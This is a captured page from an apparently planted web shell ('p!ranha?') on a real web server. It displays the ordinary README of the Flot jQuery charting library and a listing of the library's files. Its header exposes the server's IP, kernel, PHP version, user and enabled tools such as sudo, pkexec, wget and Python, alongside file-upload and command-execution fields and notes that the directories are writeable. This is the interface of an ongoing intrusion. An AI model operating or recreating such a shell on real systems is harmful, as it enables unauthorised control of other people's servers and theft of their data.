p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/home/admin/assets/vendor/flot/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/home/admin/assets/vendor/flot/README.md
# Flot [![Build status](https://travis-ci.org/flot/flot.png)](https://travis-ci.org/flot/flot)

## About ##

Flot is a Javascript plotting library for jQuery.  
Read more at the website: <http://www.flotcharts.org/>

Take a look at the the examples in examples/index.html; they should give a good
impression of what Flot can do, and the source code of the examples is probably
the fastest way to learn how to use Flot.


## Installation ##

Just include the Javascript file after you've included jQuery.

Generally, all browsers that support the HTML5 canvas tag are
supported.

For support for Internet Explorer < 9, you can use [Excanvas]
[excanvas], a canvas emulator; this is used in the examples bundled
with Flot. You just include the excanvas script like this:

```html
<!--[if lte IE 8]><script language="javascript" type="text/javascript" src="excanvas.min.js"></script><![endif]-->
```

If it's not working on your development IE 6.0, check that it has
support for VML which Excanvas is relying on. It appears that some
stripped down versions used for test environments on virtual machines
lack the VML support.

You can also try using [Flashcanvas][flashcanvas], which uses Flash to
do the emulation. Although Flash can be a bit slower to load than VML,
if you've got a lot of points, the Flash version can be much faster
overall. Flot contains some wrapper code for activating Excanvas which
Flashcanvas is compatible with.

You need at least jQuery 1.2.6, but try at least 1.3.2 for interactive
charts because of performance improvements in event handling.


## Basic usage ##

Create a placeholder div to put the graph in:

```html
<div id="placeholder"></div>
```

You need to set the width and height of this div, otherwise the plot
library doesn't know how to scale the graph. You can do it inline like
this:

```html
<div id="placeholder" style="width:600px;height:300px"></div>
```

You can also do it with an external stylesheet. Make sure that the
placeholder isn't within something with a display:none CSS property -
in that case, Flot has trouble measuring label dimensions which
results in garbled looks and might have trouble measuring the
placeholder dimensions which is fatal (it'll throw an exception).

Then when the div is ready in the DOM, which is usually on document
ready, run the plot function:

```js
$.plot($("#placeholder"), data, options);
```

Here, data is an array of data series and options is an object with
settings if you want to customize the plot. Take a look at the
examples for some ideas of what to put in or look at the 
[API reference](API.md). Here's a quick example that'll draw a line 
from (0, 0) to (1, 1):

```js
$.plot($("#placeholder"), [ [[0, 0], [1, 1]] ], { yaxis: { max: 1 } });
```

The plot function immediately draws the chart and then returns a plot
object with a couple of methods.


## What's with the name? ##

First: it's pronounced with a short o, like "plot". Not like "flawed".

So "Flot" rhymes with "plot".

And if you look up "flot" in a Danish-to-English dictionary, some of
the words that come up are "good-looking", "attractive", "stylish",
"smart", "impressive", "extravagant". One of the main goals with Flot
is pretty looks.


## Notes about the examples ##

In order to have a useful, functional example of time-series plots using time
zones, date.js from [timezone-js][timezone-js] (released under the Apache 2.0
license) and the [Olson][olson] time zone database (released to the public
domain) have been included in the examples directory.  They are used in
examples/axes-time-zones/index.html.


[excanvas]: http://code.google.com/p/explorercanvas/
[flashcanvas]: http://code.google.com/p/flashcanvas/
[timezone-js]: https://github.com/mde/timezone-js
[olson]: http://ftp.iana.org/time-zones
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 21 2023 09:32:44
1000 / 1000
0755
examples
--
December 21 2023 09:29:49
1000 / 1000
0755
API.md
53.779 KB
January 13 2024 08:34:56
1000 / 1000
0755
CONTRIBUTING.md
3.262 KB
January 13 2024 08:34:56
1000 / 1000
0755
FAQ.md
3.234 KB
January 13 2024 08:34:57
1000 / 1000
0755
LICENSE.txt
1.065 KB
January 13 2024 08:35:00
1000 / 1000
0755
Makefile
0.29 KB
January 13 2024 08:35:00
1000 / 1000
0755
NEWS.md
40.348 KB
January 13 2024 08:35:00
1000 / 1000
0755
PLUGINS.md
4.378 KB
January 13 2024 08:35:00
1000 / 1000
0755
README.md
3.801 KB
January 13 2024 08:35:00
1000 / 1000
0755
excanvas.js
42.354 KB
January 13 2024 08:34:56
1000 / 1000
0755
excanvas.min.js
18.861 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.colorhelpers.js
6.183 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.colorhelpers.min.js
3.061 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.canvas.js
9.711 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.canvas.min.js
3.866 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.categories.js
6.077 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.categories.min.js
2.543 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.crosshair.js
5.464 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.crosshair.min.js
2.117 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.errorbars.js
12.663 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.errorbars.min.js
5.331 KB
January 13 2024 08:34:57
1000 / 1000
0755
jquery.flot.fillbetween.js
5.354 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.fillbetween.min.js
2.261 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.image.js
7.423 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.image.min.js
2.626 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.js
123.183 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.min.js
51.731 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.navigate.js
14.221 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.navigate.min.js
6.42 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.pie.js
24.052 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.pie.min.js
11.903 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.resize.js
3.294 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.resize.min.js
2.295 KB
January 13 2024 08:34:58
1000 / 1000
0755
jquery.flot.selection.js
13.185 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.selection.min.js
5.153 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.stack.js
7.107 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.stack.min.js
2.413 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.symbol.js
2.516 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.symbol.min.js
1.165 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.threshold.js
4.514 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.threshold.min.js
1.803 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.time.js
11.914 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.flot.time.min.js
6.735 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.js
269.071 KB
January 13 2024 08:34:59
1000 / 1000
0755
jquery.min.js
138.972 KB
January 13 2024 08:35:00
1000 / 1000
0755